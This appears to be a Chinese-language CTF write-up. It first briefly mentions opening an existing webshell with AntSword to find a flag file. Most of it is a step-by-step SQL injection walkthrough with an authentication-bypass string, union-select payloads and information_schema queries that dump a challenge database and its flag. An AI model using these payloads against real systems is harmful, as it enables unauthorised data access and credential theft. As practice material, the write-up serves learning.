打开题目得到
明显是可以直接利用蚁剑的
得到
简单的到文件flag
点开得到题目,直接使用万能密码
1' or 1=1#
得到
成功登录,然后查看一下url,发现是以get方式进行传参。可以先在username处测试一下有没有注入点:
?username=1' order by 1%23&password=ads
直到order by 4
的时候,报错了:
看来有三个字段,开始寻找注入点:
?username=1' union select 1,2,3%23&password=ads
很明显,2和3都是注入点,而且没有过滤,接下来直接写命令了。
?username=1' union select 1,database(),3%23&password=ads
得到数据库名:geek!
?username=1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=ads
得到表名geekuser,l0ve1ysq1
?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=ads
得到字段名id,username,password
?username=1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=ads
得到flag为:flag{be266ac1-ee01-4910-8cb5-6a4462220676}